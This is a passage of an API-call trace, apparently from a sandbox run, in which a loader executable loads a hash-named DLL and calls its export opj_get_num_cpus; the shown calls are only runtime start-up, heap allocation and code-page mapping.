!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0258.553] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100) returned 0x4814b0 [0258.554] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x174) returned 0x479aa0 [0258.554] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0258.554] GetLastError () returned 0x0 [0258.554] SetLastError (dwErrCode=0x0) [0258.554] GetEnvironmentStringsW () returned 0x484680* [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9cc) returned 0x485060 [0258.554] FreeEnvironmentStringsW (penv=0x484680) returned 1 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x118) returned 0x47a7d0 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3e) returned 0x4804a0 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x5c) returned 0x470780 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x4747a0 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x78) returned 0x47c6f0 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x475a40 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x28) returned 0x47b380 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x48) returned 0x4809a0 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a) returned 0x47b620 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3a) returned 0x4808b0 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x474510 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2a) returned 0x47c770 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2e) returned 0x474810 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x47b830 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xd2) returned 0x475cd0 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x7c) returned 0x474000 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3a) returned 0x480680 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x90) returned 0x473c20 [0258.554] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x47b5c0 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x30) returned 0x474580 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x36) returned 0x475ab0 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x480450 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x52) returned 0x479080 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x480a40 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xd6) returned 0x475610 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2e) returned 0x4720d0 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1e) returned 0x47b3e0 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2c) returned 0x472110 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x54) returned 0x4790e0 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x52) returned 0x4791a0 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x47b650 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x42) returned 0x480ea0 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2c) returned 0x472150 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x480130 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x47b260 [0258.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x485060 | out: hHeap=0x470000) returned 1 [0258.555] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1000) returned 0x484680 [0258.555] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0258.555] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0258.556] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus" [0258.556] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x479770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0258.557] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0258.560] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.560] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0258.561] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.561] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0258.561] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0258.562] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.562] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0258.563] GetProcessHeap () returned 0x470000 [0258.563] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.563] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0258.563] GetLastError () returned 0x0 [0258.563] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0258.563] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0258.563] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c8) returned 0x485b10 [0258.564] SetLastError (dwErrCode=0x0) [0258.564] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1200) returned 0x485ee0 [0258.565] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0258.565] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0258.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0258.565] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0258.566] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus" [0258.566] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_num_cpus" [0258.566] GetACP () returned 0x4e4 [0258.566] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x228) returned 0x47aca0 [0258.566] IsValidCodePage (CodePage=0x4e4) returned 1 [0258.566] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0258.566] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0258.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0258.566] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0258.566] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0258.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0258.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0258.567] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0258.567] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0258.567] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0258.567] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0258.567] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0258.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0258.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0258.567] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0258.567] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0258.567] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0258.567] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0258.568] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1000) returned 0x4870f0 [0258.568] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0258.568] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0258.568] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0258.568] AreFileApisANSI () returned 1 [0258.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0258.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 